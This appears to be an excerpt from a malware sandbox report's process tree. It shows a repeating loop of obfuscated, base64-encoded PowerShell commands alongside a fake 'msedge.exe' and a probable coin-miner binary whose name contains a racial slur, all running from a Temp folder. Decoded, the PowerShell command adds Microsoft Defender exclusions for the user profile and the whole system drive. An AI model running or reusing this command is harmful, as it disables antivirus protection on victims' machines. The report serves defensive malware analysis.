        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        217⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        217⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        217⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        218⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        218⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        218⤵
        
        PID:2620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        219⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        219⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        219⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        220⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        220⤵
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        220⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        221⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        221⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        221⤵
        
        PID:1956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        222⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        222⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        222⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        223⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        223⤵
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        223⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        224⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        224⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        224⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        225⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        225⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        225⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        226⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        226⤵
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        226⤵
        
        PID:316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        227⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        227⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        227⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        228⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        228⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        228⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        229⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        229⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        229⤵
        
        PID:3812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        230⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        230⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        230⤵
        
        PID:3728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        231⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        231⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        231⤵
        
        PID:932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        232⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        232⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        232⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        233⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        233⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        233⤵
        
        PID:600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        234⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        234⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        234⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        235⤵
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        235⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        235⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        236⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        236⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        236⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        237⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        237⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        237⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        238⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        238⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        238⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        239⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        239⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        239⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        240⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        240⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        240⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        241⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        241⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        241⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        242⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        242⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        242⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        243⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        243⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        243⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        244⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        244⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        244⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
